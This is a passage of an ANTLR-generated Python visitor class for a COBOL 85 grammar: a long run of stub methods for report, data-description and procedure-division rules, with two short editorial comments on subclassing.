def visitReportDescriptionFirstDetailClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionLastDetailClause.
def visitReportDescriptionLastDetailClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionFootingClause.
def visitReportDescriptionFootingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntry.
def visitReportGroupDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat1.
def visitReportGroupDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat2.
def visitReportGroupDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupDescriptionEntryFormat3.
def visitReportGroupDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupBlankWhenZeroClause.
def visitReportGroupBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupColumnNumberClause.
def visitReportGroupColumnNumberClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupIndicateClause.
def visitReportGroupIndicateClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupJustifiedClause.
def visitReportGroupJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberClause.
def visitReportGroupLineNumberClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberNextPage.
def visitReportGroupLineNumberNextPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupLineNumberPlus.
def visitReportGroupLineNumberPlus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupClause.
def visitReportGroupNextGroupClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupPlus.
def visitReportGroupNextGroupPlus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupNextGroupNextPage.
def visitReportGroupNextGroupNextPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupPictureClause.
def visitReportGroupPictureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupResetClause.
def visitReportGroupResetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSignClause.
def visitReportGroupSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSourceClause.
def visitReportGroupSourceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupSumClause.
def visitReportGroupSumClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeClause.
def visitReportGroupTypeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeReportHeading.
def visitReportGroupTypeReportHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypePageHeading.
def visitReportGroupTypePageHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeControlHeading.
def visitReportGroupTypeControlHeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeDetail.
def visitReportGroupTypeDetail(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeControlFooting.
def visitReportGroupTypeControlFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupUsageClause.
def visitReportGroupUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypePageFooting.
def visitReportGroupTypePageFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupTypeReportFooting.
def visitReportGroupTypeReportFooting(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportGroupValueClause.
def visitReportGroupValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programLibrarySection.
def visitProgramLibrarySection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntry.
def visitLibraryDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntryFormat1.
def visitLibraryDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryDescriptionEntryFormat2.
def visitLibraryDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeClauseFormat1.
def visitLibraryAttributeClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeClauseFormat2.
def visitLibraryAttributeClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeFunction.
def visitLibraryAttributeFunction(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeParameter.
def visitLibraryAttributeParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryAttributeTitle.
def visitLibraryAttributeTitle(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureClauseFormat1.
def visitLibraryEntryProcedureClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureClauseFormat2.
def visitLibraryEntryProcedureClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureForClause.
def visitLibraryEntryProcedureForClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureGivingClause.
def visitLibraryEntryProcedureGivingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureUsingClause.
def visitLibraryEntryProcedureUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureUsingName.
def visitLibraryEntryProcedureUsingName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureWithClause.
def visitLibraryEntryProcedureWithClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryEntryProcedureWithName.
def visitLibraryEntryProcedureWithName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryIsCommonClause.
def visitLibraryIsCommonClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryIsGlobalClause.
def visitLibraryIsGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntry.
def visitDataDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat1.
def visitDataDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat2.
def visitDataDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryFormat3.
def visitDataDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescriptionEntryExecSql.
def visitDataDescriptionEntryExecSql(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataAlignedClause.
def visitDataAlignedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBlankWhenZeroClause.
def visitDataBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataCommonOwnLocalClause.
def visitDataCommonOwnLocalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataExternalClause.
def visitDataExternalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataGlobalClause.
def visitDataGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataIntegerStringClause.
def visitDataIntegerStringClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataJustifiedClause.
def visitDataJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursClause.
def visitDataOccursClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursTo.
def visitDataOccursTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataOccursSort.
def visitDataOccursSort(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataPictureClause.
def visitDataPictureClause(self, ctx):
return self.visitChildren(ctx)
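    # NOTE (editorial, not ANTLR-generated): a subclass can harvest PICTURE
    # strings by overriding the hook above. A minimal sketch; the
    # pictureString() child accessor is assumed from the grammar rule, and
    # the self.pictures list is hypothetical state on the subclass:
    #
    #     def visitDataPictureClause(self, ctx):
    #         self.pictures.append(ctx.pictureString().getText())
    #         return self.visitChildren(ctx)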
# Visit a parse tree produced by Cobol85Parser#pictureString.
def visitPictureString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#pictureChars.
def visitPictureChars(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#pictureCardinality.
def visitPictureCardinality(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataReceivedByClause.
def visitDataReceivedByClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRecordAreaClause.
def visitDataRecordAreaClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRedefinesClause.
def visitDataRedefinesClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRenamesClause.
def visitDataRenamesClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataSignClause.
def visitDataSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataSynchronizedClause.
def visitDataSynchronizedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataThreadLocalClause.
def visitDataThreadLocalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataTypeClause.
def visitDataTypeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataTypeDefClause.
def visitDataTypeDefClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataUsageClause.
def visitDataUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataUsingClause.
def visitDataUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueClause.
def visitDataValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueInterval.
def visitDataValueInterval(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueIntervalFrom.
def visitDataValueIntervalFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataValueIntervalTo.
def visitDataValueIntervalTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataWithLowerBoundsClause.
def visitDataWithLowerBoundsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivision.
def visitProcedureDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionUsingClause.
def visitProcedureDivisionUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionGivingClause.
def visitProcedureDivisionGivingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionUsingParameter.
def visitProcedureDivisionUsingParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByReferencePhrase.
def visitProcedureDivisionByReferencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByReference.
def visitProcedureDivisionByReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByValuePhrase.
def visitProcedureDivisionByValuePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionByValue.
def visitProcedureDivisionByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDeclaratives.
def visitProcedureDeclaratives(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDeclarative.
def visitProcedureDeclarative(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureSectionHeader.
def visitProcedureSectionHeader(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureDivisionBody.
def visitProcedureDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureSection.
def visitProcedureSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraphs.
def visitParagraphs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraph.
def visitParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sentence.
def visitSentence(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptStatement.
def visitAcceptStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromDateStatement.
def visitAcceptFromDateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromMnemonicStatement.
def visitAcceptFromMnemonicStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptFromEscapeKeyStatement.
def visitAcceptFromEscapeKeyStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#acceptMessageCountStatement.
def visitAcceptMessageCountStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addStatement.
def visitAddStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToStatement.
def visitAddToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToGivingStatement.
def visitAddToGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addCorrespondingStatement.
def visitAddCorrespondingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addFrom.
def visitAddFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addTo.
def visitAddTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addToGiving.
def visitAddToGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#addGiving.
def visitAddGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alteredGoTo.
def visitAlteredGoTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alterStatement.
def visitAlterStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alterProceedTo.
def visitAlterProceedTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callStatement.
def visitCallStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callUsingPhrase.
def visitCallUsingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callUsingParameter.
def visitCallUsingParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByReferencePhrase.
def visitCallByReferencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByReference.
def visitCallByReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByValuePhrase.
def visitCallByValuePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByValue.
def visitCallByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByContentPhrase.
def visitCallByContentPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByContent.
def visitCallByContent(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callGivingPhrase.
def visitCallGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cancelStatement.
def visitCancelStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cancelCall.
def visitCancelCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeStatement.
def visitCloseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeFile.
def visitCloseFile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeReelUnitStatement.
def visitCloseReelUnitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeRelativeStatement.
def visitCloseRelativeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOStatement.
def visitClosePortFileIOStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsing.
def visitClosePortFileIOUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingCloseDisposition.
def visitClosePortFileIOUsingCloseDisposition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingAssociatedData.
def visitClosePortFileIOUsingAssociatedData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingAssociatedDataLength.
def visitClosePortFileIOUsingAssociatedDataLength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computeStatement.
def visitComputeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computeStore.
def visitComputeStore(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#continueStatement.
def visitContinueStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#deleteStatement.
def visitDeleteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#disableStatement.
def visitDisableStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayStatement.
def visitDisplayStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayOperand.
def visitDisplayOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayAt.
def visitDisplayAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayUpon.
def visitDisplayUpon(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayWith.
def visitDisplayWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideStatement.
def visitDivideStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideIntoStatement.
def visitDivideIntoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideIntoGivingStatement.
def visitDivideIntoGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideByGivingStatement.
def visitDivideByGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideGivingPhrase.
def visitDivideGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideInto.
def visitDivideInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideGiving.
def visitDivideGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideRemainder.
def visitDivideRemainder(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#enableStatement.
def visitEnableStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#entryStatement.
def visitEntryStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateStatement.
def visitEvaluateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateSelect.
def visitEvaluateSelect(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateAlsoSelect.
def visitEvaluateAlsoSelect(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhenPhrase.
def visitEvaluateWhenPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhen.
def visitEvaluateWhen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateCondition.
def visitEvaluateCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateThrough.
def visitEvaluateThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateAlsoCondition.
def visitEvaluateAlsoCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhenOther.
def visitEvaluateWhenOther(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateValue.
def visitEvaluateValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execCicsStatement.
def visitExecCicsStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execSqlStatement.
def visitExecSqlStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execSqlImsStatement.
def visitExecSqlImsStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exhibitStatement.
def visitExhibitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exhibitOperand.
def visitExhibitOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exitStatement.
def visitExitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#generateStatement.
def visitGenerateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#gobackStatement.
def visitGobackStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToStatement.
def visitGoToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToStatementSimple.
def visitGoToStatementSimple(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToDependingOnStatement.
def visitGoToDependingOnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
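    # NOTE (editorial, not ANTLR-generated): control-flow metrics are a
    # typical use of these hooks. A minimal sketch of a counting subclass
    # (IfStatementCounter and its if_count attribute are hypothetical;
    # delegating back to visitChildren keeps the walk going into nested
    # statements):
    #
    #     class IfStatementCounter(Cobol85Visitor):
    #         def __init__(self):
    #             self.if_count = 0
    #         def visitIfStatement(self, ctx):
    #             self.if_count += 1               # one per IF statement
    #             return self.visitChildren(ctx)   # keep walking nested code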
# Visit a parse tree produced by Cobol85Parser#ifThen.
def visitIfThen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ifElse.
def visitIfElse(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeStatement.
def visitInitializeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeReplacingPhrase.
def visitInitializeReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeReplacingBy.
def visitInitializeReplacingBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initiateStatement.
def visitInitiateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectStatement.
def visitInspectStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTallyingPhrase.
def visitInspectTallyingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingPhrase.
def visitInspectReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTallyingReplacingPhrase.
def visitInspectTallyingReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectConvertingPhrase.
def visitInspectConvertingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectFor.
def visitInspectFor(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectCharacters.
def visitInspectCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingCharacters.
def visitInspectReplacingCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectAllLeadings.
def visitInspectAllLeadings(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingAllLeadings.
def visitInspectReplacingAllLeadings(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectAllLeading.
def visitInspectAllLeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingAllLeading.
def visitInspectReplacingAllLeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectBy.
def visitInspectBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTo.
def visitInspectTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectBeforeAfter.
def visitInspectBeforeAfter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeStatement.
def visitMergeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOnKeyClause.
def visitMergeOnKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingSequencePhrase.
def visitMergeCollatingSequencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingAlphanumeric.
def visitMergeCollatingAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingNational.
def visitMergeCollatingNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeUsing.
def visitMergeUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOutputProcedurePhrase.
def visitMergeOutputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOutputThrough.
def visitMergeOutputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeGivingPhrase.
def visitMergeGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeGiving.
def visitMergeGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveStatement.
def visitMoveStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveToStatement.
def visitMoveToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveToSendingArea.
def visitMoveToSendingArea(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveCorrespondingToStatement.
def visitMoveCorrespondingToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveCorrespondingToSendingArea.
def visitMoveCorrespondingToSendingArea(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyStatement.
def visitMultiplyStatement(self, ctx):
